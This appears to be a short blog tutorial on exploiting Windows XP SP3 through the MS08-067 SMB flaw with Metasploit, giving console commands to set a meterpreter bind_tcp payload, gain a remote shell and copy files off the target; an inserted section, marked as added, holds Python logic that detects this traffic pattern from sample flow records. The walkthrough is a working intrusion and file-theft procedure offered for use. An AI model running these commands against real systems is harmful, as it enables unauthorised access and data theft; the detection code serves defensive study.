Mar 13

Hacking XP SP3 with BackTrack Using Metasploit

Getting shell access on XP SP3 with Metasploit
Enter msfconsole.
use windows/smb/ms08_067_netapi <enter>
(show exploits lists the exploits that can be used.)
set payload windows/meterpreter/bind_tcp <enter>
This will allow you to use Meterpreter to connect to the shell of the XP box.
show options <enter>
set RPORT 445 (Optional, but recommended) <enter>
set RHOST (remote host) *the machine you are attacking’s IP address* <enter>
set LHOST (local host) *your backtrack machine’s IP address* <enter>
exploit <enter>
This will give you access to the XP box.
If you want shell access, type in shell.
NOTE: when you type in shell, you will need to use DOS commands! dir will display folder contents (the equivalent of ls).
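
From the defender's side, the steps above leave a recognizable network trace: a connection to TCP 445 on the target, followed shortly by the same source connecting to a port the target does not normally listen on (the bind_tcp listener). The following Python detection logic is an added example, not part of the original post; the flow records, the per-host port baseline and the 60-second window are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample flow records: (timestamp, source IP, destination IP, destination port).
# Addresses come from documentation ranges; none of this is real traffic.
FLOWS = [
    ("2024-01-10 09:00:01", "192.0.2.10", "198.51.100.5", 445),   # routine file share use
    ("2024-01-10 09:00:03", "192.0.2.10", "198.51.100.5", 139),
    ("2024-01-10 11:30:12", "192.0.2.77", "198.51.100.5", 445),   # SMB from an unusual source...
    ("2024-01-10 11:30:15", "192.0.2.77", "198.51.100.5", 4444),  # ...then a port outside the baseline
    ("2024-01-10 12:00:00", "192.0.2.10", "198.51.100.6", 3389),
]

# Hypothetical baseline of ports each host is expected to accept connections on.
BASELINE = {"198.51.100.5": {139, 445}, "198.51.100.6": {445, 3389}}
WINDOW = timedelta(seconds=60)  # assumed correlation window


def find_bind_shell_pattern(flows, baseline, window=WINDOW):
    """Return alerts where a source connects to TCP 445 on a host and, within
    `window`, connects to a port on that host that is not in its baseline."""
    last_smb = {}  # (src, dst) -> time of the most recent connection to 445
    alerts = []
    parsed = sorted(
        (datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), src, dst, port)
        for ts, src, dst, port in flows
    )
    for when, src, dst, port in parsed:
        if port == 445:
            last_smb[(src, dst)] = when
            continue
        if port in baseline.get(dst, set()):
            continue  # expected service, nothing to correlate
        smb_time = last_smb.get((src, dst))
        if smb_time is not None and when - smb_time <= window:
            alerts.append({
                "src": src, "dst": dst, "new_port": port,
                "seconds_after_smb": int((when - smb_time).total_seconds()),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_bind_shell_pattern(FLOWS, BASELINE):
        print(alert)
```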

To transfer files, you MUST be at the meterpreter prompt, not in the Windows shell. If you are in the Windows shell, type “exit” to get out.
Syntax:
download c:\\FILE\\PATH\\TO\\FILE /LOCATION/TO/SAVE/ON/BackTrack
upload /FILE/ON/BackTrack c:\\LOCATION\\TO\\COPY
For a video, see http://www.youtube.com/watch?v=fj4ckhacLrE except use “set payload windows/meterpreter/bind_tcp <enter>” in place of whatever they use for the payload. I’ll possibly post a video later.

More Info:
http://www.offensive-security.com/metasploit-unleashed/Metasploit_Meterpreter_Basics